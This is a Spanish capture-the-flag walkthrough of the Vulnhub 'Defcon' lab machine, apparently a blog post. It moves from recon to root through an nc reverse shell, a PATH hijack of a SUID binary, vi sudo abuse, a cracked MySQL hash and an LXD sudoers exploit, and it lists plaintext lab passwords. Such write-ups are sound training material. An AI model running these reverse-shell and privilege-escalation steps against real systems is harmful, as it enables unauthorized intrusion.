[VLN] Defcon

Hoy vamos a hackear la maquina de Vulnhub llamada Defcon. Podeis descargarla desde el siguiente enlace: Defcon



Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 21:40 CEST
Nmap scan report for
Host is up (0.00096s latency).
Not shown: 65531 filtered ports
22/tcp  open   ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp  open   http     Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://nsa-server.net
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Job Search | Intelligence Careers
| ssl-cert: Subject: commonName=nsa-server/organizationName=National Security 
| Not valid before: 2019-06-10T14:04:18
|_Not valid after:  2019-07-10T14:04:18
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: nsa-server

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 289.46 seconds
Al entrar a nos redirige a nsa-server.net, el cual no encuentra... Agregamos nsa-server.net a /etc/hosts. Una vez agregado, entramos en http://nsa-server.net. Si revisamos el certificado, en "Detalles -> Issuers" podemos ver una direccion de mail john@nsa-secretserver.net. Agregamos tambien nsa-secretserver.net a /etc/hosts. Visitamos https://nsa-secretserver.net/ Si vemos la "animacion" de la consola que nos aparece en la pagina principal, justo al final podremos ver:


Parece codigo morse, asi que vamos a tratar de ver que dice. Lo primero es eliminar el caracter "\". El caracter "/" lo podemos mantener, o reemplazarlo por un espacio. Quedaria de la siguiente forma:

- .... . .-- --- .-. -.. .--. .-. . ... ... .--. .- ... ... .-- --- .-. -.. --- 
..-. .--- --- .... -. .. ... ... - .---- .-.. .-.. ...-- .- ... -.-- -.-.-- 
-.-.-- -.-.--
Una vez con el codigo morse "limpio" vamos a la siguiente web y hacemos la traduccion. https://morsecode.world/international/translator.html El resultado es:

Si miramos bien, nos indica que los credenciales para acceder al Wordpress son: JOHN/ST1LL3ASY!!! Sabiendo esto vamos a https://nsa-secretserver.net/wp-admin y nos logueamos con los credenciales que hemos conseguido. Vamos a: WORDPRESS -> TOOLS -> WPTERM Tenenemos acceso a una terminal :) Ponemos nc en la escucha en nuestra maquina.

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
En la terminal "web" ejecutamos:

graham:/var/www/wordpress $ nc -e /bin/bash 5555
Y obtenemos la reverse shell.

Graham to John

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 49098
python3 -c 'import pty; pty.spawn("/bin/bash");'
Exploramos un poco el sistema, y en el fichero mbox del directorio de graham podemos ver lo siguiente:

graham@nsa-server:/home/graham$ cat mbox

From john@nsa-server Mon Jun 10 11:35:48 2019
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
        (envelope-from )
        id 1haGiS-0004Sh-6R
        for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password.
I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

Parece que "john" ha olvidado la password. Seguimos investigando el sistema y miramos el fichero .viminfo.

graham:/home/graham $ cat .viminfo
# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Debug Line History (newest to oldest):

# Registers:
""1	LINE	0
	export SSLKEYLOGFILE=/home/graham/master.log
|3,1,1,1,1,0,1557842873,"export SSLKEYLOGFILE=/home/graham/master.log"

# File marks:
'0  20  0  ~/.local/share/Trash/files/note.txt
Al parecer ha estado editando el fichero note.txt.. Lo revisamos.

graham@nsa-server:/home/graham$ cat ~/.local/share/Trash/files/note.txt
cat ~/.local/share/Trash/files/note.txt
Hi John,

After your latest password failure I changed it. You know where it is right? 
Wink Wink!
Pretty easy right? Try not to forget this one also.
You know how the boss is like! You wanna get fired or something?

Also smart idea to sent this message with netcat right?
I don't trust our mailsystem.
After sending this message, I'll trow it away....no one will know.

hahahaha......now who is a cybernoob!!!!



P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
Despues de mirar bien el mensaje, vemos que el password de john son las letras "mayusuclas" que aparecen en P.S, asi que el password de john es YDNETSRIDH. Teniendo estos credenciales, nos cambiamos al usuario john.

graham@nsa-server:/home/graham$ su john
Miramos si john puede hacer algo con sudo.

john@nsa-server:~$ sudo -l
sudo -l
Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass,

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
        /bin/systemctl status ssh
Podemos arrancar ssh asi que lo arrancamos :)

john@nsa-server:~$ sudo /bin/systemctl start ssh
Miramos en que puerto se ejecuta.

john@nsa-server:~$ netstat -ntlp
netstat -ntlp                                                                   
(Not all processes could be identified, non-owned process info                  
 will not be shown, you would have to be root to see it all.)                   
Active Internet connections (only servers)                                      
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
PID/Program name                                                                
tcp        0      0*               LISTEN      
tcp        0      0    *               LISTEN      
tcp        0      0*               LISTEN      
tcp        0      0    *               LISTEN      
tcp        0      0  *               LISTEN      
tcp        0      0   *               LISTEN      
tcp        0      0   *               LISTEN      
Vemos que se ejecuta en el puerto 222, asi que nos logueamos como john usando ssh.

John to George

sml@m0nique:~$ ssh john@ -p 222
john@'s password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Wed Apr 22 13:16:25 2020 from
Tras explorar el sistema como john, vemos un fichero curioso en /home/john/Documents que se llama secret.png. Lo copiamos a nuestra maquina.

sml@m0nique:~$ scp -P 222 john@ .
Miramos de que tipo de fichero se trata.

sml@m0nique:~$ file secret.png
secret.png: PDF document, version \012.\012
La extension es .png sin embargo, el comando "file" nos indica que se trata de un documento PDF. Abrimos el fichero con GHEX, modificamos el HEADER por: 89 50 4E 47 0D 0A 1A 0A, es decir el Header de un PNG. Una vez cambiado el Header, guardamos y podemos abrir el fichero como una imagen. Vemos que la password es: 2W3dsF5tGh-Kl#1 Tras probar con los usuarios del sistema, la clave es del usuario george. Nos conectamos como george...

George to Samantha

sml@m0nique:~$ ssh george@ -p 222
george@'s password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:56:10 2020 from
Miramos que puede hacer con sudo.

george@nsa-server:~$ sudo -l
[sudo] password for george:                                                     
Matching Defaults entries for george on nsa-server:                             
 env_reset, mail_badpass, 
User george may run the following commands on nsa-server:                                                                                                        
    (samantha) /usr/bin/vi                                                                                                                                        
Vemos que puede ejecutar vi como samantha. Lo hacemos.

george@nsa-server:~$ sudo -u samantha /usr/bin/vi
Y para obtener una shell como samantha usando vi:


Samantha to Nicky

En la home de samantha podemos ver un fichero interesante, check.

samantha@nsa-server:~$ cd /home/samantha
samantha@nsa-server:~$ ls -l                                                                                                                                    
total 60                                                                           
-rwsr-xr-x 1 root     root     8792 Apr 10 16:17 check   
Al ejecutarlo, vemos que es la salida del comando "ss"

samantha@nsa-server:~$ strings check
ss -tupan
Tras mirar con strings, vemos que no usa la ruta completa para ejecutar ss... Sabiendo esto, vamos a usar un "ss" que nos otorgara una shell. Primero, agregamos a la variable PATH que busque nuestro directorio actual para que antes de ejecutar el "ss" autentico, ejecute el falso.

samantha@nsa-server:~$ export PATH=.:$PATH
samantha@nsa-server:~$ echo $PATH
En nuestra maquina preparamos el ss "falso".

samantha@nsa-server:~$ cat ss.c
int main(void)
setuid(0); setgid(0); system("/bin/bash");
samantha@nsa-server:~$ gcc -o ss ss.c
ss.c: In function ‘main’:
ss.c:7:1: warning: implicit declaration of function ‘system’ 
Lo compilamos y damos los permisos correspondientes.

samantha@nsa-server:~$ chmod u+s ss
samantha@nsa-server:~$ chmod +x ss
Por ultimo, ejecutamos!

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

bash-4.4$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)

Nicky to Root

Bien, ahora que somos "nicky" exploramos el sistema.

bash-4.4$ cd /home/nicky/Documents
bash-4.4$ ls -la
total 12
drwxr-xr-x  2 nicky nicky 4096 Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4096 Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
bash-4.4$ cat .passwd
Parece que hemos encontrado su password :) La usamos para conectarnos por ssh como nicky.

sml@m0nique:~$ ssh nicky@ -p 222
nicky@'s password: 
Miramos si nicky puede conectarse al mysql.

nicky@nsa-server:~$ mysql -u nicky -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
Estamos dentro de mysql :) Exploramos las BBDD.

MariaDB [(none)]> show databases;
| Database           |
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
4 rows in set (0.01 sec)
Elegimos la BBDD mysql.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
Miramos que tablas hay.

MariaDB [mysql]> show tables;
| Tables_in_mysql           |
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
30 rows in set (0.00 sec)
Hay una tabla curiosa, llamada user. Le echamos un vistazo.

MariaDB [mysql]> select * from user;
| Host      | User    | Password  
| localhost | admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| %         | smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| localhost | nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 | 
5 rows in set (0.00 sec)
Vemos que aparece el usuario smith... Buscamos el hash/password en google... Nos manda a: https://twitter.com/onlinehashcrack/status/287432972456562689 en el cual se puede ver que la password es: abygurl69 Nos logueamos como el usuario smith. Vemos que smith esta en el grupo lxc. Buscamos el ejecutable "lxc" y agregamos la ruta a nuestra variable $PATH.

smith@nsa-server:~$ whereis lxc
smith@nsa-server:~$ clear
smith@nsa-server:~$ find / -name lxc 2>/dev/null
smith@nsa-server:~$ export PATH=/snap/bin:$PATH
En /home/smith vemos un script sh llamado lxd-exploit el cual puede funcionar... Al ejecutarlo sin parametros nos dice que necesita el nombre del container...

smith@nsa-server:~$ sh lxd-exploit.sh 
The exploit currently requires an existing container.
Miramos el nombre de los containers que hay.

smith@nsa-server:~$ lxc list
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
| nsa-lab | STOPPED |      |      | PERSISTENT |           |
Vemos que hay una maquina llamada nsa-lab. Sabien que el nombre de maquina es nsa-lab, ejecutamos el exploit.

smith@nsa-server:~$ sh lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
Error: The container is already stopped
[+] Setting container security privilege on
[+] Starting container nsa-lab
[+] Mounting host root filesystem to nsa-lab
Device rootdisk added to nsa-lab
[+] Using container to add smith to /etc/sudoers
[+] Unmounting host root filesystem from nsa-lab
Device rootdisk removed from nsa-lab
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!
Vamos a disfrutar de nuestros superpoderes sudo!

Privilege Escalation

smith@nsa-server:~$ sudo su
Y ya con root, terminamos de explorar...


root@nsa-server:~# ls
clean.sh  Documents  endlessh  names     Public    snap       thinclient_drives
Desktop   Downloads  Music     Pictures  root.txt  Templates  Videos
root@nsa-server:~# cat root.txt




Y con esto ya seriamos root de la maquina :)